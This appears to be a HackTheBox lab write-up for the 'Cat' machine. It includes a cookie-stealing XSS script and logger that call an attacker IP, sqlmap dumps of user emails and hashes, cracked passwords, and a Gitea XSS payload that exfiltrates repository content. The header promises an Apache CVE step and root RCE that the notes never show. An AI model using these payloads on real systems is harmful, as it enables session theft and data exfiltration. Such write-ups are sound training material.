WriteupsHTB — Cat
WebMediumLinux
HTB — Cat
Apache mod_rewrite CVE-2024-38472 XSS in redirect. Stored XSS steals admin cookie for Gitea access. SQLite injection and Gitea hook RCE for root.
February 1, 2025HackTheBox
#XSS#CVE-2024-38472#Gitea#SQLite Injection
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-01 23:48 EST
Nmap scan report for 10.10.11.53
Host is up (0.029s latency).
Not shown: 65493 closed tcp ports (reset), 40 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| 256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_ 256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 22.20 ms 10.10.14.1
2 22.33 ms 10.10.11.53
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.28 secondssh
sudo nmap -sU -sV -sC -p U:161,162,53,22,110,143,623,993,995 10.10.11.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-01 23:50 EST
Nmap scan report for 10.10.11.53
Host is up (0.024s latency).
PORT STATE SERVICE VERSION
22/udp closed ssh
53/udp closed domain
110/udp closed pop3
143/udp closed imap
161/udp closed snmp
162/udp closed snmptrap
623/udp closed asf-rmcp
993/udp closed imaps
995/udp open|filtered pop3s80
sh
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5dirsearch
sh
dirsearch -u http://cat.htb
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Cat/reports/http_cat.htb/_25-02-02_00-36-53.txt
Target: http://cat.htb/
[00:36:53] Starting:
[00:36:55] 301 - 301B - /.git -> http://cat.htb/.git/
[00:36:55] 403 - 272B - /.git/
[00:36:55] 200 - 92B - /.git/config
[00:36:55] 200 - 7B - /.git/COMMIT_EDITMSG
[00:36:55] 200 - 23B - /.git/HEAD
[00:36:55] 403 - 272B - /.git/branches/
[00:36:55] 403 - 272B - /.git/hooks/
[00:36:55] 200 - 73B - /.git/description
[00:36:55] 200 - 240B - /.git/info/exclude
[00:36:55] 200 - 2KB - /.git/index
[00:36:55] 403 - 272B - /.git/info/
[00:36:55] 403 - 272B - /.git/logs/
[00:36:55] 200 - 150B - /.git/logs/HEAD
[00:36:55] 301 - 311B - /.git/logs/refs -> http://cat.htb/.git/logs/refs/
[00:36:55] 200 - 150B - /.git/logs/refs/heads/master
[00:36:55] 301 - 317B - /.git/logs/refs/heads -> http://cat.htb/.git/logs/refs/heads/
[00:36:55] 403 - 272B - /.git/objects/
[00:36:55] 301 - 312B - /.git/refs/heads -> http://cat.htb/.git/refs/heads/
[00:36:55] 403 - 272B - /.git/refs/
[00:36:55] 200 - 41B - /.git/refs/heads/master
[00:36:55] 301 - 311B - /.git/refs/tags -> http://cat.htb/.git/refs/tags/
[00:36:55] 403 - 272B - /.ht_wsr.txt
[00:36:55] 403 - 272B - /.htaccess.orig
[00:36:55] 403 - 272B - /.htaccess.sample
[00:36:55] 403 - 272B - /.htaccessBAK
[00:36:55] 403 - 272B - /.htaccess.bak1
[00:36:55] 403 - 272B - /.htaccess.save
[00:36:55] 403 - 272B - /.htaccessOLD
[00:36:55] 403 - 272B - /.htaccess_orig
[00:36:55] 403 - 272B - /.htaccess_sc
[00:36:55] 403 - 272B - /.htaccess_extra
[00:36:55] 403 - 272B - /.html
[00:36:55] 403 - 272B - /.htaccessOLD2
[00:36:55] 403 - 272B - /.htm
[00:36:55] 403 - 272B - /.htpasswd_test
[00:36:55] 403 - 272B - /.htpasswds
[00:36:55] 403 - 272B - /.httr-oauth
[00:36:56] 403 - 272B - /.php
[00:37:00] 302 - 1B - /admin.php -> /join.php
[00:37:08] 200 - 1B - /config.php
[00:37:10] 301 - 300B - /css -> http://cat.htb/css/
[00:37:15] 301 - 300B - /img -> http://cat.htb/img/
[00:37:18] 302 - 0B - /logout.php -> /
[00:37:27] 403 - 272B - /server-status
[00:37:27] 403 - 272B - /server-status/
[00:37:33] 301 - 304B - /uploads -> http://cat.htb/uploads/
[00:37:33] 403 - 272B - /uploads/vhost fuzzing
sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://cat.htb/ -H 'Host: FUZZ.cat.htb' -fw 20 -mc allgit dumper
sh
git-dumper http://cat.htb/.git ./website
XSS cookie
script.js
sh
new Image().src='http://10.10.14.13/index.php?c='+document.cookieindex.php
php
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>sh
sudo php -S 0.0.0.0:80- create username with below and login
sh
<script src=http://10.10.14.13/script.js></script>- send something with contest
sh
sudo php -S 0.0.0.0:80
[Sun Feb 2 17:44:46 2025] PHP 8.2.27 Development Server (http://0.0.0.0:80) started
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50118 Accepted
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50118 [200]: GET /script.js
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50118 Closing
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50124 Accepted
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50124 [200]: GET /index.php?c=PHPSESSID=hsljj5j7m2mjjlb4tbobejfedk
[Sun Feb 2 17:57:12 2025] 10.10.11.53:50124 Closing
view_cat.php
sql injection
-
in contest upload another sample
-
click on
Admin -
click on
Acceptintercept the post request and send to burp -
create username with below and login
sh
<script src=http://10.10.14.13/script.js></script>- send a contest sample request and wait for admin cookies
- change admin cookies in inspect element
script.js
sh
new Image().src='http://10.10.14.13/index.php?c='+document.cookieindex.php
php
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>sh
sudo php -S 0.0.0.0:80
sh
sqlmap -r req.txt --batch --random-agent --level=5 --risk=3 --no-cast
___
__H__
___ ___[.]_____ ___ ___ {1.9#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:50:48 /2025-02-02/
[18:50:48] [INFO] parsing HTTP request from 'req.txt'
[18:50:48] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[18:50:48] [INFO] testing connection to the target URL
[18:50:48] [INFO] testing if the target URL content is stable
[18:50:48] [INFO] target URL content is stable
[18:50:48] [INFO] testing if POST parameter 'catName' is dynamic
[18:50:48] [WARNING] POST parameter 'catName' does not appear to be dynamic
[18:50:48] [WARNING] heuristic (basic) test shows that POST parameter 'catName' might not be injectable
[18:50:49] [INFO] testing for SQL injection on POST parameter 'catName'
[18:50:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:50:52] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[18:50:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[18:50:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[18:51:02] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[18:51:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[18:51:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[18:51:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[18:51:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:51:07] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:51:09] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:51:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[18:51:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[18:51:13] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:51:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:51:19] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:51:22] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:51:25] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:51:27] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:51:30] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:51:32] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[18:51:35] [INFO] testing 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)'
[18:51:38] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[18:51:40] [INFO] testing 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[18:51:43] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[18:51:43] [INFO] POST parameter 'catName' appears to be 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)' injectable (with --code=200)
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[18:51:43] [INFO] testing 'Generic inline queries'
[18:51:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:51:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:51:44] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[18:51:45] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[18:51:45] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[18:51:46] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[18:51:47] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[18:51:47] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[18:51:48] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[18:51:49] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[18:51:50] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[18:51:50] [INFO] checking if the injection point on POST parameter 'catName' is a false positive
POST parameter 'catName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1716 HTTP(s) requests:
---
Parameter: catName (POST)
Type: boolean-based blind
Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
Payload: catName=test' AND CASE WHEN 6744=6744 THEN 6744 ELSE JSON(CHAR(80,78,117,103)) END AND 'Foiz'='Foiz&catId=1sh
sqlmap -r req.txt --batch --random-agent --level=5 --risk=3 --no-cast --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.9#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:53:49 /2025-02-02/
[18:53:49] [INFO] parsing HTTP request from 'req.txt'
[18:53:49] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040802 Firefox/0.9.2' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[18:53:49] [INFO] resuming back-end DBMS 'sqlite'
[18:53:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: catName (POST)
Type: boolean-based blind
Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
Payload: catName=test' AND CASE WHEN 6744=6744 THEN 6744 ELSE JSON(CHAR(80,78,117,103)) END AND 'Foiz'='Foiz&catId=1
---
[18:53:49] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: SQLite
sh
sqlmap -r req.txt --batch --random-agent --tables
___
__H__
___ ___[,]_____ ___ ___ {1.9#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:58:15 /2025-02-02/
[18:58:16] [INFO] parsing HTTP request from 'req.txt'
[18:58:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[18:58:16] [INFO] resuming back-end DBMS 'sqlite'
[18:58:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: catName (POST)
Type: boolean-based blind
Title: SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)
Payload: catName=test' AND CASE WHEN 6744=6744 THEN 6744 ELSE JSON(CHAR(80,78,117,103)) END AND 'Foiz'='Foiz&catId=1
---
[18:58:16] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: SQLite
[18:58:16] [INFO] fetching tables for database: 'SQLite_masterdb'sh
sqlmap -r req.txt --batch --dump --level 5 --risk 3 --random-agent --tamper=between --technique=t --tables
___
__H__
___ ___[(]_____ ___ ___ {1.9#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:11:47 /2025-02-02/
[19:11:47] [INFO] parsing HTTP request from 'req.txt'
[19:11:47] [INFO] loading tamper module 'between'
[19:11:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.1 Safari/532.0' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[19:11:47] [INFO] resuming back-end DBMS 'sqlite'
[19:11:47] [INFO] testing connection to the target URL
[19:11:47] [WARNING] heuristic (basic) test shows that POST parameter 'catName' might not be injectable
[19:11:47] [INFO] testing for SQL injection on POST parameter 'catName'
[19:11:47] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[19:11:47] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[19:11:55] [INFO] POST parameter 'catName' appears to be 'SQLite > 2.0 AND time-based blind (heavy query)' injectable
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[19:11:55] [INFO] checking if the injection point on POST parameter 'catName' is a false positive
POST parameter 'catName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: catName (POST)
Type: time-based blind
Title: SQLite > 2.0 AND time-based blind (heavy query)
Payload: catName=test212' AND 2243=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'QSsW'='QSsW&catId=1
---
[19:12:27] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:12:27] [INFO] the back-end DBMS is SQLite
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: SQLite
[19:12:27] [INFO] fetching tables for database: 'SQLite_masterdb'
[19:12:27] [INFO] fetching number of tables for database 'SQLite_masterdb'
[19:12:27] [INFO] retrieved:
[19:12:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
4
[19:12:31] [INFO] retrieved:
[19:12:38] [INFO] adjusting time delay to 2 seconds due to good response times
accepted_cats
[19:13:36] [INFO] retrieved: sqlite_sequence
[19:14:46] [INFO] retrieved: cats
[19:15:03] [INFO] retrieved: users
<current>
[4 tables]
+-----------------+
| accepted_cats |
| cats |
| sqlite_sequence |
| users |
+-----------------+- have to do it fast therefore need to increase the
--threads=4
sh
sqlmap -r req.txt -p catName --dbms=SQLite --batch --level 5 --risk 3 --threads=4 --technique=B -T 'users' --dump --flush-session
___
__H__
___ ___[)]_____ ___ ___ {1.9#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:51:04 /2025-02-03/
[22:51:04] [INFO] parsing HTTP request from 'req.txt'
[22:51:04] [INFO] flushing session file
[22:51:04] [INFO] testing connection to the target URL
[22:51:04] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:51:04] [INFO] testing if the target URL content is stable
[22:51:04] [INFO] target URL content is stable
[22:51:04] [WARNING] heuristic (basic) test shows that POST parameter 'catName' might not be injectable
[22:51:04] [INFO] testing for SQL injection on POST parameter 'catName'
[22:51:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:51:07] [INFO] POST parameter 'catName' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[22:51:07] [INFO] checking if the injection point on POST parameter 'catName' is a false positive
POST parameter 'catName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: catName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catName=test'||(SELECT CHAR(106,116,69,84) WHERE 1792=1792 AND 9608=9608)||'&catId=1
---
[22:52:38] [INFO] retrieved: <script src=http://10.10.14.13/script.js></script>
[22:52:38] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[22:52:38] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[22:52:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[22:52:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[22:52:38] [INFO] starting 6 processes
[22:52:41] [INFO] cracked password 'test' for user '<script src=http://10.10.14.13/script.js></script>'
Database: <current>
Table: users
[11 entries]
+---------+-------------------------------+-----------------------------------------+----------------------------------------------------+
| user_id | email | password | username |
+---------+-------------------------------+-----------------------------------------+----------------------------------------------------+
| 1 | axel2017@gmail.com | d1bbba36... | axel |
| 2 | rosamendoza485@gmail.com | ac369922... | rosa |
| 3 | robertcervantes2000@gmail.com | 42846631... | robert |
| 4 | fabiancarachure2323@gmail.com | 39e153e8... | fabian |
| 5 | jerrysonC343@gmail.com | 781593e0... | jerryson |
| 6 | larryP5656@gmail.com | 1b6dce24... | larry |
| 7 | royer.royer2323@gmail.com | c598f6b844a36fa7836fba0835f1f6 | royer |
| 8 | peterCC456@gmail.com | e41ccefa... | peter |
| 9 | angel234g@gmail.com | 24a8ec00... | angel |
| 10 | jobert2020@gmail.com | 88e4dcec... | jobert |
| 11 | test@email.com | 098f6bcd... (test) | <script src=http://10.10.14.13/script.js></script> |
+---------+-------------------------------+-----------------------------------------+----------------------------------------------------+
sh
d1bbba36...
ac369922...
42846631...
39e153e8...
781593e0...
1b6dce24...
c598f6b844a36fa7836fba0835f1f6
e41ccefa...
24a8ec00...
88e4dcec...- only rosa md5 hash cracked.
sh
hashcat -m 0 'ac369922...' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6-851-g6716447df) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-penryn-13th Gen Intel(R) Core(TM) i9-13900HX, 5327/10718 MB (2048 MB allocatable), 6MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
ac369922...:soyunaprincesarosassh as rosa
sh
ssh rosa@10.10.11.53
rosa@10.10.11.53's password: soyunaprincesarosa
rosa@cat:~$ whoami
rosaadm group
- this group can read logs
sh
rosa@cat:~$ id
uid=1001(rosa) gid=1001(rosa) groups=1001(rosa),4(adm)sh
rosa@cat:/var/log$ grep -rn ./ -ie 'pass'sh
./apache2/access.log.1:2753:127.0.0.1 - - [02/Feb/2025:23:59:36 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
./apache2/access.log.1:2773:127.0.0.1 - - [02/Feb/2025:23:59:57 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&logcreds
axel:aNdZwgC4tI9gnVXv_e3Q
axel
sh
rosa@cat:/home$ su axel
Password:
axel@cat:/home$ whoami
axeluser.txt
sh
axel@cat:~$ cat user.txt
ee2b0788...Priv Esc
sh
axel@cat:~$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:44935 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33269 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:39035 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* - sh
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31sh
╔══════════╣ Mails (limit 50)
3839 4 -rw-rw---- 1 axel mail 1961 Jan 14 16:49 /var/mail/axel
3872 0 -rw-rw---- 1 jobert mail 0 Jan 14 16:54 /var/mail/jobert
29987 96 -rw------- 1 root mail 93030 Feb 3 04:30 /var/mail/root
3839 4 -rw-rw---- 1 axel mail 1961 Jan 14 16:49 /var/spool/mail/axel
3872 0 -rw-rw---- 1 jobert mail 0 Jan 14 16:54 /var/spool/mail/jobert
29987 96 -rw------- 1 root mail 93030 Feb 3 04:30 /var/spool/mail/rootinternal port 3000
sh
./chisel server --reverse --port 1234sh
axel@cat:~$ ./chisel client 10.10.14.13:1234 R:3000:127.0.0.1:3000
/var/mail
sh
axel@cat:/var/mail$ cat axel
From rosa@cat.htb Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services
Hi Axel,
We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.
Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.
From rosa@cat.htb Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management
We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.
Gitea 1.22.0 - Stored XSS
- https://www.exploit-db.com/exploits/52077
- reset box
axel:aNdZwgC4tI9gnVXv_e3Q
sh
ssh -L 3000:localhost:3000 -L 25:localhost:25 axel@10.10.11.53sh
<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.13:4444/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">test</a>
- worked using another port
sh
python3 -m http.server 4444- have to send several times
sh
swaks --to "jobert@localhost" --from "axel@localhost" --header "Subject: click link http://localhost:3000/axel/test" --body "http://localhost:3000/axel/test" --server localhost --port 25sh
python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
